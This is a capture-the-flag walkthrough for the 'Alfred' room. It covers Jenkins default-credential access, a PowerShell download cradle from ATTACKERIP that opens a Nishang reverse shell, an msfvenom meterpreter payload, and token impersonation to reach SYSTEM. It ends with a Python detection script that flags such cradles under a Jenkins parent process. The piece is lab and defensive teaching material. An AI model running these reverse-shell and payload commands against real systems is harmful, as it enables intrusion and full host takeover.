Alfred

Tasks:

  1. Initial Access:

    1. An Nmap scan with nmap -T5 -sV ip reveals ports 80, 3389 and 8080 open: port 80 runs Microsoft IIS and port 8080 runs Jetty 9.4.z-SNAPSHOT. Opening http://ip:8080 in a browser shows a Jenkins login page.
    2. Log in with the default credentials admin:admin, then go to Project > Configure > General > Build > Execute Batch Command.
    3. Nishang is a collection of PowerShell scripts used for enumeration, Windows privilege escalation, reverse shells and more; this task uses its reverse shell script. Host the script from the attacker machine with a Python HTTP server on port 80.
    4. Start a netcat listener on port 1337 in the attacker terminal. In the text box below Execute Batch Command, enter powershell iex (New-Object Net.WebClient).DownloadString('http://ATTACKERIP:80/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ATTACKERIP -Port 1337, save, and start a build; the shell arrives in netcat.
    5. cd C:\Users\bruce\Desktop and type user.txt to obtain the user flag.
  2. Switching Shells:
    1. Generate the payload with msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKERIP LPORT=ATTACKERPORT -f exe -o shell.exe.
    2. Download the payload to the victim with powershell "(New-Object System.Net.WebClient).DownloadFile('http://ATTACKERIP:80/Shells/shell.exe','shell.exe')".
    3. Set up a handler in Metasploit to start listening: use exploit/multi/handler, set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST ATTACKERIP, set LPORT ATTACKERPORT, then run.
    4. Run Start-Process shell.exe to get a meterpreter shell.
  3. Privilege Escalation:
    1. Run whoami /priv: SeDebugPrivilege and SeImpersonatePrivilege are enabled.
    2. In the meterpreter shell run load incognito to exploit this, list_tokens -g to list the tokens available for impersonation, and impersonate_token "BUILTIN\Administrators" to impersonate the Administrators token.
    3. migrate pid: migrate to a safe process such as services.exe.
    4. Now run pwd; you will be inside C:\Windows\System32\. cd config and cat root.txt to obtain the root flag and submit it!
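
A detection-side counterpart to the chain above, added here as an example and not part of the original writeup: a Jenkins batch build step runs as java.exe -> cmd.exe -> child, so the check walks the parent chain over constructed Sysmon-style process-creation records (the pids, install paths and the 203.0.113.9 address are made up) and flags PowerShell download cradles or whoami /priv executed under a Jenkins ancestor.

```python
import re
# Constructed Sysmon-style process-creation records (Event ID 1), not logs from
# the room: pids, paths and the 203.0.113.9 address are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Program Files\Jenkins\jre\bin\java.exe",
     "cmdline": "java -jar jenkins.war"},
    {"pid": 5200, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c call C:\Windows\Temp\jenkins1234.bat"},
    {"pid": 5300, "ppid": 5200, "image": PS,
     "cmdline": "powershell iex (New-Object Net.WebClient).DownloadString('http://203.0.113.9:80/"
                "Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 203.0.113.9 -Port 1337"},
    {"pid": 5400, "ppid": 5200, "image": PS,
     "cmdline": "powershell \"(New-Object System.Net.WebClient).DownloadFile('http://203.0.113.9:80/Shells/shell.exe','shell.exe')\""},
    {"pid": 6100, "ppid": 5200, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /priv"},
    # Benign: an administrator's interactive PowerShell with no Jenkins ancestor.
    {"pid": 6000, "ppid": 1200, "image": PS, "cmdline": r"powershell Get-ChildItem C:\Users"},
]
# Download-cradle markers used by the build step in the writeup.
CRADLE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|\biex\b|Invoke-Expression", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def has_jenkins_ancestor(pid, by_pid, max_depth=8):
    # A batch build step runs as java.exe -> cmd.exe -> child, so a direct-parent
    # check would miss it; walk the chain. The Jenkins install path is an assumption.
    ev, depth = by_pid.get(pid), 0
    while ev is not None and depth < max_depth:
        if basename(ev["image"]) == "java.exe" and "jenkins" in ev["image"].lower():
            return True
        ev, depth = by_pid.get(ev["ppid"]), depth + 1
    return False

def find_suspicious(events):
    """Return [(pid, reason)] for cradles or privilege enumeration spawned under Jenkins."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        if name in ("powershell.exe", "pwsh.exe") and CRADLE.search(e["cmdline"]):
            reason = "download cradle"
        elif name == "whoami.exe" and "/priv" in e["cmdline"].lower():
            reason = "privilege enumeration"
        else:
            continue
        if has_jenkins_ancestor(e["ppid"], by_pid):
            hits.append((e["pid"], reason))
    return hits
```

On a real host the same logic applies to Sysmon Event ID 1 or Security 4688 records once ProcessId/ParentProcessId are parsed into the same dict shape.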
